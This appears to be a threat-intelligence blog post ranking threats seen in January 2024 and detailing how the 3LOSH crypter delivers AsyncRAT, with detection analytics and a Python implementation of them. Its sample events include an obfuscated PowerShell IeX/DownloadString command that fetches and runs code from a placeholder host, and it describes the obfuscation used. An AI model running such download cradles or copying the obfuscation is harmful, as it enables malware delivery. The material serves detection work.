
Intelligence Insights: February 2024

The new year brings familiar faces, including 3LOSH delivering AsyncRAT, in this month’s edition of Intelligence Insights

The Red Canary Team

Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and share a public version of it with the broader infosec community.

Highlights

To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months. 

Here’s how the numbers shook out for January 2024:

Last month's rank | Threat name | Threat description
--- | --- | ---
➡ 1 | Impacket | Collection of Python classes to construct/manipulate network protocols
2* | | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives
2* | | Dropper/Downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code
4 | | Open source tool that dumps credentials using various techniques
5* | Gootloader | JScript dropper/downloader that typically poses as a document containing an "agreement", often distributed through search engine redirects
5* | Yellow Cockatoo | Activity cluster characterized by the delivery of an information stealer and .NET RAT via search engine redirects
7* | 3LOSH | Crypter, typically used to package and deliver a remote access tool like AsyncRAT
7* | AsyncRAT | Open source remote access tool with multiple functions including keylogging and remote desktop control
7* | Charcoal Stork | Suspected pay-per-install (PPI) provider that uses malvertising to deliver installers, often disguised as cracked games, fonts, or desktop wallpaper
7* | Denim Drongo | Group that leverages installers masquerading as QuickBooks in a scam that attempts to defraud users via fake technical support

↑ = trending up from previous month
↓ = trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Observations on trending threats

We kicked off the new year with many threats that are no strangers to our top 10 list. Impacket remained at number 1 for the third month in a row, thanks to a combination of malicious use and testing. We remove confirmed testing from our top 10, but if activity isn’t confirmed as testing we leave it in our metrics.

Gootloader saw a significant increase in activity, jumping from 22nd last month to tie for 5th with Yellow Cockatoo this month. We dug deeper to gain insight into such a dramatic change; our current assessment is that there doesn’t seem to be a wave of increased Gootloader activity in general across the community, but rather a chance increase of Gootloader in our customers’ environments.

3LOSH and AsyncRAT spotted getting cozy

We saw 3LOSH and AsyncRAT in a four-way tie for 7th this January. The last time they made an appearance in the top 10 was also together, back in July 2023, and the pairing is no coincidence.

3LOSH is a crypter frequently used to package and deliver remote access tools (RATs). It has been in use since at least August 2021. At Red Canary we have most frequently seen AsyncRAT delivered by 3LOSH, a pattern noted outside our environments as well. Other researchers have also reported seeing 3LOSH deliver njRAT and LimeRAT.

Since 3LOSH is used by a variety of adversaries, the initial access vector also varies. One method observed in the wild is phishing campaigns leveraging HTML smuggling to download an ISO containing the 3LOSH script. Separately, we at Red Canary have seen ZIP files containing the 3LOSH script and also uncompressed downloads of 3LOSH as a JavaScript attachment. Next, 3LOSH relies on user execution of the malicious .wsf or .js script, typically executed via wscript.exe.

For example:

"WScript.exe" "C:\Users\username\AppData\Local\Temp\Temp1_invoice-000000.zip\invoice-000000.wsf"

or

"C:\Windows\System32\WScript.exe" "C:\Users\username\Downloads\Your_Social_Security_Statement_is_streamlined_Service_ID_XXXXo1xq5sa8S.JS"

In some cases, 3LOSH leverages bitsadmin.exe to download an intermediary Visual Basic script, and it may also execute PowerShell to download remote resources. 3LOSH sometimes obfuscates this command line by splitting the IeX(NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING command into substrings assigned to randomly named variables. The execution chain of wscript spawning PowerShell, plus the use of Invoke-Expression or one of its aliases, gives us a detection opportunity:

Detection opportunity: Instances of PowerShell being spawned by wscript, using Invoke-Expression or one of its aliases

The following pseudo-detection analytic identifies instances of wscript spawning PowerShell, specifically using Invoke-Expression or one of its aliases. A variety of threats, including 3LOSH, use this behavior to execute malicious scripts on victim systems.

process == (powershell)
&&
parent_process == (wscript)
&&
command_line_includes == (iex, .invoke, invoke-expression)

As mentioned, AsyncRAT is often the RAT-du-jour delivered by 3LOSH. AsyncRAT is an open source RAT that can be configured to perform a number of functions, including keylogging and remote desktop control, making it a popular choice among multiple adversaries.

AsyncRAT is also delivered using methods besides 3LOSH. Since at least January 2024, Red Canary and other researchers have observed the delivery of AsyncRAT via SocGholish malicious JavaScript files.

AsyncRAT is sometimes injected into the process regsvcs.exe, which gives us a detection opportunity.

Detection opportunity: regsvcs.exe executing without any command-line parameters

This pseudo-detection analytic identifies regsvcs.exe executing without any command-line parameters. Normally regsvcs.exe executes with a CLI argument. Threats like AsyncRAT will be injected into regsvcs.exe in an attempt to evade detection while continuing malicious activity, like reaching out to remote resources or executing additional processes.

process == (regsvcs)
&&
command_line_includes == (null)
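
Both pseudo-detection analytics in this post (wscript spawning PowerShell with Invoke-Expression or an alias, and regsvcs.exe running with no command-line parameters) as runnable logic over constructed process-creation events. This is an added example, not Red Canary's detection code; the event field names, file paths and sample command lines are assumptions, and the alias match is case-insensitive because the post shows 3LOSH using mixed-case IeX.

```python
import re
import shlex
from typing import Iterable, List

# Invoke-Expression and its aliases; IGNORECASE because the post shows mixed-case "IeX(...)".
IEX_PATTERN = re.compile(r"\biex\b|\.invoke\b|invoke-expression", re.IGNORECASE)

def image_name(path: str) -> str:
    """'C:\\Windows\\System32\\WScript.exe' -> 'wscript' (basename, lower-cased, no .exe)."""
    name = path.strip().strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def wscript_spawns_iex_powershell(ev: dict) -> bool:
    """process == powershell && parent_process == wscript && command line has iex/.invoke/invoke-expression."""
    return (image_name(ev.get("process", "")) == "powershell"
            and image_name(ev.get("parent_process", "")) == "wscript"
            and IEX_PATTERN.search(ev.get("command_line", "")) is not None)

def regsvcs_without_arguments(ev: dict) -> bool:
    """process == regsvcs && command_line_includes == (null): only the image path is present."""
    if image_name(ev.get("process", "")) != "regsvcs":
        return False
    try:  # posix=False keeps Windows backslashes and quoted paths intact
        return len(shlex.split(ev.get("command_line", ""), posix=False)) <= 1
    except ValueError:  # unbalanced quotes: cannot decide, so do not alert
        return False

def run_analytics(events: Iterable[dict]) -> List[str]:
    hits: List[str] = []
    for i, ev in enumerate(events):
        if wscript_spawns_iex_powershell(ev):
            hits.append(f"{i}:wscript->powershell iex")
        if regsvcs_without_arguments(ev):
            hits.append(f"{i}:regsvcs no args")
    return hits

# Constructed sample telemetry, not real events; example.invalid is a reserved test domain.
SAMPLE_EVENTS: List[dict] = [
    {"process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_process": r"C:\Windows\System32\WScript.exe",
     "command_line": "powershell -w hidden -c \"IeX(NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('http://example.invalid/a')\""},
    {"process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_process": r"C:\Windows\explorer.exe",
     "command_line": "powershell -c Get-Process"},  # benign: not a child of wscript, no iex
    {"process": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", "parent_process": r"C:\Windows\System32\WScript.exe",
     "command_line": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},  # quoted image path, no arguments
    {"process": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", "parent_process": r"C:\Windows\System32\cmd.exe",
     "command_line": r"RegSvcs.exe C:\build\MyComponent.dll"},  # legitimate registration with an argument
]

if __name__ == "__main__":
    print(run_analytics(SAMPLE_EVENTS))  # ['0:wscript->powershell iex', '2:regsvcs no args']
```

Because the post notes that 3LOSH sometimes splits the IeX string across randomly named variables, the literal alias match is the weaker half of the first analytic; the wscript-to-PowerShell parent/child relationship is the part a rewritten command line does not change.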
